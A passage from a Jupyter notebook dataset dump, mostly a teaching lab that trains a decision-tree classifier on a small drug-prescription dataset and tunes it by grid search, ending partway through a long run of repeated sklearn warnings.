string at line breaks and returns a list\n\n#### startswith()\t\nReturns true if the string starts with the specified value\n\n#### strip()\t\nReturns a trimmed version of the string\n\n#### swapcase()\t\nSwaps cases, lower case becomes upper case and vice versa\n\n#### title()\t\nConverts the first character of each word to upper case\n\n#### translate()\t\nReturns a translated string\n\n#### upper()\t\nConverts a string into upper case\n\n#### zfill()\t\nFills the string with a specified number of 0 values at the beginning", "_____no_output_____" ] ], [ [ "s1 = \"Great\"\n\nprint(num.isdigit())\nprint(num.isnumeric())\nprint(num.isdecimal())", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ] ]
e72e30372a6320b3de10c4f98c7ed74f14e81904
557,315
ipynb
Jupyter Notebook
Drug Prescription via Decision Tree Classifier/ML0101EN-Clas-Decision-Trees-drug-py-v1.ipynb
Syed-Sherjeel/Classification-Problems
9abdd45a339ff1df0792748b83ab49424fc813fd
[ "MIT" ]
null
null
null
Drug Prescription via Decision Tree Classifier/ML0101EN-Clas-Decision-Trees-drug-py-v1.ipynb
Syed-Sherjeel/Classification-Problems
9abdd45a339ff1df0792748b83ab49424fc813fd
[ "MIT" ]
null
null
null
Drug Prescription via Decision Tree Classifier/ML0101EN-Clas-Decision-Trees-drug-py-v1.ipynb
Syed-Sherjeel/Classification-Problems
9abdd45a339ff1df0792748b83ab49424fc813fd
[ "MIT" ]
null
null
null
254.947392
377,124
0.873587
[ [ [ "\n# Decision Trees\n\nEstaimted time needed: **15** minutes\n\n## Objectives\n\nAfter completing this lab you will be able to:\n\n- Develop a classification model using Decision Tree Algorithm\n", "_____no_output_____" ], [ "In this lab exercise, you will learn a popular machine learning algorithm, Decision Tree. You will use this classification algorithm to build a model from historical data of patients, and their response to different medications. Then you use the trained decision tree to predict the class of a unknown patient, or to find a proper drug for a new patient.\n", "_____no_output_____" ], [ "<h1>Table of contents</h1>\n\n<div class=\"alert alert-block alert-info\" style=\"margin-top: 20px\">\n <ol>\n <li><a href=\"#about_dataset\">About the dataset</a></li>\n <li><a href=\"#downloading_data\">Downloading the Data</a></li>\n <li><a href=\"#pre-processing\">Pre-processing</a></li>\n <li><a href=\"#setting_up_tree\">Setting up the Decision Tree</a></li>\n <li><a href=\"#modeling\">Modeling</a></li>\n <li><a href=\"#prediction\">Prediction</a></li>\n <li><a href=\"#evaluation\">Evaluation</a></li>\n <li><a href=\"#visualization\">Visualization</a></li>\n </ol>\n</div>\n<br>\n<hr>\n", "_____no_output_____" ], [ "Import the Following Libraries:\n\n<ul>\n <li> <b>numpy (as np)</b> </li>\n <li> <b>pandas</b> </li>\n <li> <b>DecisionTreeClassifier</b> from <b>sklearn.tree</b> </li>\n</ul>\n", "_____no_output_____" ] ], [ [ "import numpy as np \nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier", "_____no_output_____" ] ], [ [ "<div id=\"about_dataset\">\n <h2>About the dataset</h2>\n Imagine that you are a medical researcher compiling data for a study. You have collected data about a set of patients, all of whom suffered from the same illness. During their course of treatment, each patient responded to one of 5 medications, Drug A, Drug B, Drug c, Drug x and y. 
\n <br>\n <br>\n Part of your job is to build a model to find out which drug might be appropriate for a future patient with the same illness. The feature sets of this dataset are Age, Sex, Blood Pressure, and Cholesterol of patients, and the target is the drug that each patient responded to.\n <br>\n <br>\n It is a sample of binary classifier, and you can use the training part of the dataset \n to build a decision tree, and then use it to predict the class of a unknown patient, or to prescribe it to a new patient.\n</div>\n", "_____no_output_____" ], [ "<div id=\"downloading_data\"> \n <h2>Downloading the Data</h2>\n To download the data, we will use !wget to download it from IBM Object Storage.\n</div>\n", "_____no_output_____" ] ], [ [ "!wget -O drug200.csv https://s3-api.us-geo.objectstorage.softlayer.net/cf-courses-data/CognitiveClass/ML0101ENv3/labs/drug200.csv", "--2020-10-11 10:54:57-- https://s3-api.us-geo.objectstorage.softlayer.net/cf-courses-data/CognitiveClass/ML0101ENv3/labs/drug200.csv\nResolving s3-api.us-geo.objectstorage.softlayer.net (s3-api.us-geo.objectstorage.softlayer.net)... 67.228.254.196\nConnecting to s3-api.us-geo.objectstorage.softlayer.net (s3-api.us-geo.objectstorage.softlayer.net)|67.228.254.196|:443... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 6027 (5.9K) [text/csv]\nSaving to: ‘drug200.csv’\n\ndrug200.csv 100%[===================>] 5.89K --.-KB/s in 0s \n\n2020-10-11 10:54:57 (14.0 MB/s) - ‘drug200.csv’ saved [6027/6027]\n\n" ] ], [ [ "**Did you know?** When it comes to Machine Learning, you will likely be working with large datasets. As a business, where can you host your data? 
IBM is offering a unique opportunity for businesses, with 10 Tb of IBM Cloud Object Storage: [Sign up now for free](http://cocl.us/ML0101EN-IBM-Offer-CC)\n", "_____no_output_____" ], [ "now, read data using pandas dataframe:\n", "_____no_output_____" ] ], [ [ "my_data = pd.read_csv(\"drug200.csv\", delimiter=\",\")\nmy_data[0:5]", "_____no_output_____" ] ], [ [ "<div id=\"practice\"> \n <h3>Practice</h3> \n What is the size of data? \n</div>\n", "_____no_output_____" ] ], [ [ "# write your code here\nmy_data.size\n\n", "_____no_output_____" ] ], [ [ "<div href=\"pre-processing\">\n <h2>Pre-processing</h2>\n</div>\n", "_____no_output_____" ], [ "Using <b>my_data</b> as the Drug.csv data read by pandas, declare the following variables: <br>\n\n<ul>\n <li> <b> X </b> as the <b> Feature Matrix </b> (data of my_data) </li>\n <li> <b> y </b> as the <b> response vector (target) </b> </li>\n</ul>\n", "_____no_output_____" ], [ "Remove the column containing the target name since it doesn't contain numeric values.\n", "_____no_output_____" ] ], [ [ "X = my_data[['Age', 'Sex', 'BP', 'Cholesterol', 'Na_to_K']].values\nX[0:5]", "_____no_output_____" ] ], [ [ "As you may figure out, some features in this dataset are categorical such as **Sex** or **BP**. Unfortunately, Sklearn Decision Trees do not handle categorical variables. But still we can convert these features to numerical values. 
**pandas.get_dummies()**\nConvert categorical variable into dummy/indicator variables.\n", "_____no_output_____" ] ], [ [ "from sklearn import preprocessing\nle_sex = preprocessing.LabelEncoder()\nle_sex.fit(['F','M'])\nX[:,1] = le_sex.transform(X[:,1]) \n\n\nle_BP = preprocessing.LabelEncoder()\nle_BP.fit([ 'LOW', 'NORMAL', 'HIGH'])\nX[:,2] = le_BP.transform(X[:,2])\n\n\nle_Chol = preprocessing.LabelEncoder()\nle_Chol.fit([ 'NORMAL', 'HIGH'])\nX[:,3] = le_Chol.transform(X[:,3]) \n\nX[0:5]\n", "_____no_output_____" ] ], [ [ "Now we can fill the target variable.\n", "_____no_output_____" ] ], [ [ "y = my_data[\"Drug\"]\ny[0:5]", "_____no_output_____" ] ], [ [ "<hr>\n\n<div id=\"setting_up_tree\">\n <h2>Setting up the Decision Tree</h2>\n We will be using <b>train/test split</b> on our <b>decision tree</b>. Let's import <b>train_test_split</b> from <b>sklearn.cross_validation</b>.\n</div>\n", "_____no_output_____" ] ], [ [ "from sklearn.model_selection import train_test_split", "_____no_output_____" ] ], [ [ "Now <b> train_test_split </b> will return 4 different parameters. We will name them:<br>\nX_trainset, X_testset, y_trainset, y_testset <br> <br>\nThe <b> train_test_split </b> will need the parameters: <br>\nX, y, test_size=0.3, and random_state=3. <br> <br>\nThe <b>X</b> and <b>y</b> are the arrays required before the split, the <b>test_size</b> represents the ratio of the testing dataset, and the <b>random_state</b> ensures that we obtain the same splits.\n", "_____no_output_____" ] ], [ [ "X_trainset, X_testset, y_trainset, y_testset = train_test_split(X, y, test_size=0.3, random_state=3)", "_____no_output_____" ] ], [ [ "<h3>Practice</h3>\nPrint the shape of X_trainset and y_trainset. Ensure that the dimensions match\n", "_____no_output_____" ] ], [ [ "# your code\nX_trainset.shape,y_trainset.shape\n", "_____no_output_____" ] ], [ [ "Print the shape of X_testset and y_testset. 
Ensure that the dimensions match\n", "_____no_output_____" ] ], [ [ "# your code\nX_testset.shape,y_testset.shape\n", "_____no_output_____" ] ], [ [ "<hr>\n\n<div id=\"modeling\">\n <h2>Modeling</h2>\n We will first create an instance of the <b>DecisionTreeClassifier</b> called <b>drugTree</b>.<br>\n Inside of the classifier, specify <i> criterion=\"entropy\" </i> so we can see the information gain of each node.\n</div>\n", "_____no_output_____" ] ], [ [ "drugTree = DecisionTreeClassifier(criterion=\"entropy\", max_depth = 4)\ndrugTree # it shows the default parameters", "_____no_output_____" ] ], [ [ "Next, we will fit the data with the training feature matrix <b> X_trainset </b> and training response vector <b> y_trainset </b>\n", "_____no_output_____" ] ], [ [ "drugTree.fit(X_trainset,y_trainset)", "_____no_output_____" ] ], [ [ "<hr>\n\n<div id=\"prediction\">\n <h2>Prediction</h2>\n Let's make some <b>predictions</b> on the testing dataset and store it into a variable called <b>predTree</b>.\n</div>\n", "_____no_output_____" ] ], [ [ "predTree = drugTree.predict(X_testset)", "_____no_output_____" ] ], [ [ "You can print out <b>predTree</b> and <b>y_testset</b> if you want to visually compare the prediction to the actual values.\n", "_____no_output_____" ] ], [ [ "print (predTree [0:5])\nprint (y_testset [0:5])\n", "['drugY' 'drugX' 'drugX' 'drugX' 'drugX']\n40 drugY\n51 drugX\n139 drugX\n197 drugX\n170 drugX\nName: Drug, dtype: object\n" ] ], [ [ "<hr>\n\n<div id=\"evaluation\">\n <h2>Evaluation</h2>\n Next, let's import <b>metrics</b> from sklearn and check the accuracy of our model.\n</div>\n", "_____no_output_____" ] ], [ [ "from sklearn import metrics\nimport matplotlib.pyplot as plt\nprint(\"DecisionTrees's Accuracy: \", metrics.accuracy_score(y_testset, predTree))", "DecisionTrees's Accuracy: 0.9833333333333333\n" ] ], [ [ "**Accuracy classification score** computes subset accuracy: the set of labels predicted for a sample must exactly match the 
corresponding set of labels in y_true. \n\nIn multilabel classification, the function returns the subset accuracy. If the entire set of predicted labels for a sample strictly match with the true set of labels, then the subset accuracy is 1.0; otherwise it is 0.0.\n", "_____no_output_____" ], [ "## Practice\n\nCan you calculate the accuracy score without sklearn ?\n", "_____no_output_____" ] ], [ [ "# your code here\nfrom sklearn import tree\nfrom sklearn import metrics,model_selection", "_____no_output_____" ] ], [ [ "# Declare and play with model", "_____no_output_____" ] ], [ [ "model=tree.DecisionTreeClassifier(criterion='entropy')\nmodel.fit(X_trainset,y_trainset)\nyhat=model.predict(X_testset)\nmetrics.classification_report(y_testset,yhat)", "_____no_output_____" ], [ "model", "_____no_output_____" ] ], [ [ "# USE Grid Search for best parameters", "_____no_output_____" ] ], [ [ "model=tree.DecisionTreeClassifier(criterion='entropy')\nscorer=metrics.make_scorer(metrics.f1_score,average='weighted')\nparam={'criterion':['entropy'],'max_depth':[2,4,6,8,10,12,14,16],\n 'min_samples_leaf':[2,4,6,8,10,12,14,16],'min_samples_split':[2,4,6,8,10,12,14,16]}\nGrid1=model_selection.GridSearchCV(model,param,scoring=scorer)\nGrid1.fit(X_trainset,y_trainset)\n#Grid1.best_estimator_", "/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/model_selection/_split.py:2053: FutureWarning: You should specify a value for 'cv' instead of relying on the default value. 
The default value will change from 3 to 5 in version 0.22.\n warnings.warn(CV_WARNING, FutureWarning)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: 
UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, 
warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 
predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is 
ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no predicted samples.\n 'precision', 'predicted', average, warn_for)\n/home/jupyterlab/conda/envs/python/lib/python3.6/site-packages/sklearn/metrics/classification.py:1143: UndefinedMetricWarning: F-score is ill-defined and being set to 0.0 in labels with no 